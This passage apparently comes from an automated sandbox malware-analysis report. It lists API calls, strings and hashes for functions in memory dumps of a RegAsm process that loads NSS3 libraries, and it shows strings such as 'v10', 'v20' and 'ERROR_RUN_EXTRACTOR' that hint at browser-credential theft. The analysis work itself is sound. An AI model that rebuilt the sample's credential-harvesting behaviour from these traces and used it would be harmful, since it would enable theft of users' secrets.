Part of subcall function 6CA85220: free.MOZGLUE(00000000), ref: 6CA852A9

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID:
API String ID: 3150690610-0
Opcode ID: cb8f8e5cbc954b81f16a03f35948e2007225f351dae2dd3ee0d5a182df73da2f
Instruction ID: 20f5f61d75fd9d07310ef4535f7dc92c17d41545ad52dfc5cd5d0ece13f405db
Opcode Fuzzy Hash: cb8f8e5cbc954b81f16a03f35948e2007225f351dae2dd3ee0d5a182df73da2f
Instruction Fuzzy Hash: 7221D3B5D012049BEB10AF68DD41AEEB7B4EF09318F544129ED0AA7701EB31A998CBD1

Function 6CAC3C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CAC5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC3D3F

Part of subcall function 6CA3BA90: PORT_NewArena_Util.NSS3(00000800,6CAC3CAF,?), ref: 6CA3BABF
Part of subcall function 6CA3BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CAC3CAF,?), ref: 6CA3BAD5
Part of subcall function 6CA3BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CAC3CAF,?), ref: 6CA3BB08
Part of subcall function 6CA3BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CAC3CAF,?), ref: 6CA3BB1A
Part of subcall function 6CA3BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CAC3CAF,?), ref: 6CA3BB3B

PR_EnterMonitor.NSS3(?), ref: 6CAC3CCB

Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90AB
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90C9
Part of subcall function 6CAF9090: EnterCriticalSection.KERNEL32 ref: 6CAF90E5
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF9116
Part of subcall function 6CAF9090: LeaveCriticalSection.KERNEL32 ref: 6CAF913F

PR_EnterMonitor.NSS3(?), ref: 6CAC3CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CAC3CF8
PR_ExitMonitor.NSS3(?), ref: 6CAC3D15
PR_ExitMonitor.NSS3(?), ref: 6CAC3D2E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: 382f2f8cdbd66be2d550519a8107332a7c0865ecf2fedd7d3d39ea35e5a14481
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: BE113875B126006FE7215E39ED417DBB2E4AF11308F400934E49AD7B20E632F85DC643

Function 6CA8FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CA8FE08

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CA8FE1D

Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CA8FE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CA8FE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CA8FE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6CA8FE6F

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: b6d69712ce97cfa2b9daa68928f6dc52753c7f64134ea3b5ed4d98f963246324
Instruction ID: 2b0536d9095f53057e888bf1dc13610fec0c39d593b955080737187895367955
Opcode Fuzzy Hash: b6d69712ce97cfa2b9daa68928f6dc52753c7f64134ea3b5ed4d98f963246324
Instruction Fuzzy Hash: 38110CB66022066BEB008F54DC41A5B73E8AF59299F24803CE91C87B12E731D994C7A1

Function 6CB3FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6CB3FD9E

Part of subcall function 6CAF9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA21A48), ref: 6CAF9BB3
Part of subcall function 6CAF9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA21A48), ref: 6CAF9BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6CB3FDB9

Part of subcall function 6CA1A900: TlsGetValue.KERNEL32(00000000,?,6CB914E4,?,6C9B4DD9), ref: 6CA1A90F
Part of subcall function 6CA1A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA1A94F

PR_Unlock.NSS3 ref: 6CB3FDD4
PR_Lock.NSS3 ref: 6CB3FDF2
PR_NotifyAllCondVar.NSS3 ref: 6CB3FE0D
PR_Unlock.NSS3 ref: 6CB3FE23

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: d85703e45d4f3127c5174df8dde06162b1c5fe7ce6ddd391defe6d1f154492f9
Instruction ID: 2d86eb6628a27a18fe83450b76fa6c0753166f324d83458cf17a530bb88b15c6
Opcode Fuzzy Hash: d85703e45d4f3127c5174df8dde06162b1c5fe7ce6ddd391defe6d1f154492f9
Instruction Fuzzy Hash: 2A01A5BAA041516BDF058E65FE008457B35FB07268B194374E83A47BE1E732ED28DE92

Function 0041210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000000,?,?,?,00413794,00000000,00000010), ref: 00412119
lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
lstrlenA.KERNEL32(?), ref: 00412144
wsprintfA.USER32 ref: 00412156

Strings

%s%s, xrefs: 00412150
C:\Users\user\Desktop\, xrefs: 0041212C, 00412131

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-3088838541
Opcode ID: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction ID: 2b65b01ea0560ea7e18c8daf8da5e1637e4a778ce13f385dfd922e5b6f13eae1
Opcode Fuzzy Hash: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction Fuzzy Hash: 83F0E9322002157FDF091F99DC48D9B7FAEDF45666F000061F908D2211C6775F1586E5

Function 6CA1AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA1AFDA

Strings

misuse, xrefs: 6CA1AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6CA1AF5C
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA1AFC4
%s at line %d of [%.10s], xrefs: 6CA1AFD3

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 6e64d5c8ea349d089257712ee0af2eb15154cbbc29505a56ad8b2a7e5954c6fc
Instruction ID: bec0668e2ee87a61931c3c7a7fca9e475f9373bfe2ed0ace68e4b8b9193cf985
Opcode Fuzzy Hash: 6e64d5c8ea349d089257712ee0af2eb15154cbbc29505a56ad8b2a7e5954c6fc
Instruction Fuzzy Hash: BB91F4B5B082158FDB04CF59C890BAAB7F2BF45314F1D85A8E865ABB91C334ED45CB60

Function 6CA7FC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CA7FC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CA7FCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CA7FDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CA7FDDE

Part of subcall function 6CA88800: TlsGetValue.KERNEL32(?,6CA9085A,00000000,?,6CA38369,?), ref: 6CA88821
Part of subcall function 6CA88800: TlsGetValue.KERNEL32(?,?,6CA9085A,00000000,?,6CA38369,?), ref: 6CA8883D
Part of subcall function 6CA88800: EnterCriticalSection.KERNEL32(?,?,?,6CA9085A,00000000,?,6CA38369,?), ref: 6CA88856
Part of subcall function 6CA88800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CA88887
Part of subcall function 6CA88800: PR_Unlock.NSS3(?,?,?,?,6CA9085A,00000000,?,6CA38369,?), ref: 6CA88899

Strings

pkcs11:, xrefs: 6CA7FC4F

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: f1b3ff55ca4589167540fbf41bdd2bfd77454e0043f363be7b18271b7289df77
Instruction ID: 9dd876c0db8a87364cee14d0aa910d17b18a1bc9d17bccc51d964d81eb4862e2
Opcode Fuzzy Hash: f1b3ff55ca4589167540fbf41bdd2bfd77454e0043f363be7b18271b7289df77
Instruction Fuzzy Hash: 0251F579A061119BEB209F699F40F5A3374BF4135CF19002DDD155BB42EB30EA88CBB2

Function 0040826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00408307
LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 0040833C

Strings

v20, xrefs: 00408286
ERROR_RUN_EXTRACTOR, xrefs: 004082BE
v10, xrefs: 004082CE

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 52611349-380572819
Opcode ID: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction ID: daba9ed892d092cabdd565eab6a30784efdfa5406d791c1b040b6213e04440cf
Opcode Fuzzy Hash: 93e336829a09b04c9a22f2871bb72d6da27ca2d0679549906ea092d0de62e08c
Instruction Fuzzy Hash: 0141B3B2A00118ABCF10DFA5CD42ADE3BB8AB84714F15413BFD40F7280EB78D9458B99

Function 0041BFC6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,771A83C0,00000000,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C019
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C58F,?,00416F27), ref: 0041C049
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C075
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C58F,?,00416F27,?), ref: 0041C083

Part of subcall function 0041B991: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,01102590), ref: 0041B9C5

Strings

'oA, xrefs: 0041BFD6

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 'oA
API String ID: 3986731826-570265369
Opcode ID: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction ID: 1898f3f14c485dfe9e4ef6ed33e1055e23cef853a536fbea19f5c84a704e6684
Opcode Fuzzy Hash: 5a4a7b219b2098a5fb872391a6b6813c9c431c7c45877e2e4ef416b00ba26d56
Instruction Fuzzy Hash: DA416D71800209DFCF14DFA9C880AEEBFF9FF48310F10416AE855EA256E3359985CBA4

Function 6C9BBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C9BBE02

Part of subcall function 6CAE9C40: memcmp.VCRUNTIME140(?,00000000,6C9BC52B), ref: 6CAE9D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9BBE9F

Strings

database corruption, xrefs: 6C9BBE93
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9BBE89
%s at line %d of [%.10s], xrefs: 6C9BBE98

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: b95a11621268b8f70b449beb3e379478787a318a8a19f3dc1876d0646bd663c3
Instruction ID: 7269f2c41c64fb4e20704312ffa514c3909f9aee350054a3ca03032893a4459b
Opcode Fuzzy Hash: b95a11621268b8f70b449beb3e379478787a318a8a19f3dc1876d0646bd663c3
Instruction Fuzzy Hash: 00312371A04299ABC700CFA9D8D4AAFBBB6AF45314B098554FE583BAE1D370EC04C7D0

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

string too long, xrefs: 0040F2E1
invalid string position, xrefs: 0040F2C2

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction ID: 57eaf4f8ed72a9c9f24929b0a4870ba8c902719b5e729f6aa90dd4ccac796c9b
Opcode Fuzzy Hash: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
Instruction Fuzzy Hash: 6611E0713002029FCB24DF6DD881A59B3A5BF45324754053AF816EBAC2C7B8ED498799

Function 6CA20DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CA20BDE), ref: 6CA20DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CA20BDE), ref: 6CA20DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CA20BDE), ref: 6CA20DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CA20BDE), ref: 6CA20E32

Strings

%s incr => %d (find lib), xrefs: 6CA20E2D

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: c1aee4daff37f3cdc25e15a6fa3548997f40903e2623be48c8b110c93b2c2d71
Instruction ID: 3e45a427a4e117fc1d69f18f2e82f78571486f4cea21b2af2befe12327496653
Opcode Fuzzy Hash: c1aee4daff37f3cdc25e15a6fa3548997f40903e2623be48c8b110c93b2c2d71
Instruction Fuzzy Hash: DF01D472B00260AFE7209F249C45E1BB3BDDF46A09B09446DE909E3A41E765FC9887E1

Function 6C9C9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C9C9CF2
LeaveCriticalSection.KERNEL32(?), ref: 6C9C9D45
EnterCriticalSection.KERNEL32(?), ref: 6C9C9D8B
LeaveCriticalSection.KERNEL32(?), ref: 6C9C9DDE

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

